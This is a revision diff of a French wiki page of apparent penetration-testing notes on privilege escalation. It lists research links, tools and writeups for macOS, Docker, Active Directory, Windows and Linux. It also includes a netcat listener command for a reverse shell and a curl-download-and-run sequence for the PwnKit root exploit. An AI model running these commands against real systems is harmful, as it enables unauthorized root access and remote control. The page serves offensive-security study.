Outils d'utilisateurs

Outils du Site


privilege_escalation

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

privilege_escalation [2022/06/21 10:13]
M0N5T3R
privilege_escalation [2024/02/09 20:50] (Version actuelle)
M0N5T3R
Ligne 1: Ligne 1:
 {{ :privesc.jpg?nolink&1600 |}} {{ :privesc.jpg?nolink&1600 |}}
 +
 +====== MacOs ======
 +
 +    https://www.ns-echo.com/posts/cve_2023_33298.html
 +
 +====== docker ======
 +    https://flast101.github.io/docker-privesc/
 +    https://github.com/stealthcopter/deepce
 +
 +
 +====== active directory ======
 +    https://github.com/CravateRouge/bloodyAD
 +    https://github.com/antonioCoco/RemotePotato0
 +    https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
 +    https://github.com/Dec0ne/KrbRelayUp
  
  
Ligne 32: Ligne 47:
          
 **tools :** **tools :**
 +
 +  * PrivescCheck: This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. https://github.com/itm4n/PrivescCheck
 +
  
   * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS   * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Ligne 73: Ligne 91:
   * -> Depuis kali : nc -nlvp 7777   * -> Depuis kali : nc -nlvp 7777
  
 +
 +
 +
 +
 +**Liste de ressources :**
 +
 +    https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/
 +    https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities
 +    https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
 +    CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service
 +    https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
 +    https://github.com/LordNoteworthy/windows-exploitation
 +    https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/
 +    https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf
 +    https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
 +    https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
 +    https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease
 +    https://github.com/Wh04m1001?tab=repositories
 +    https://secret.club/2020/04/23/directory-deletion-shell.html    
 +    https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
 +
 +
 +
 +**Liste de writeups**
 +
 +    https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/
 +    https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
 +    https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
 +    https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
  
 ====== Linux ====== ====== Linux ======
Ligne 95: Ligne 142:
 **Linux Privilege Escalation using SUID Binaries** **Linux Privilege Escalation using SUID Binaries**
 https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
 +
 +**Escalate to root using pkexec**
 +  * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
 +  * chmod +x PwnKit 
 +  * ./PwnKit
  
  
privilege_escalation.1655799183.txt.gz · Dernière modification: 2022/06/21 10:13 par M0N5T3R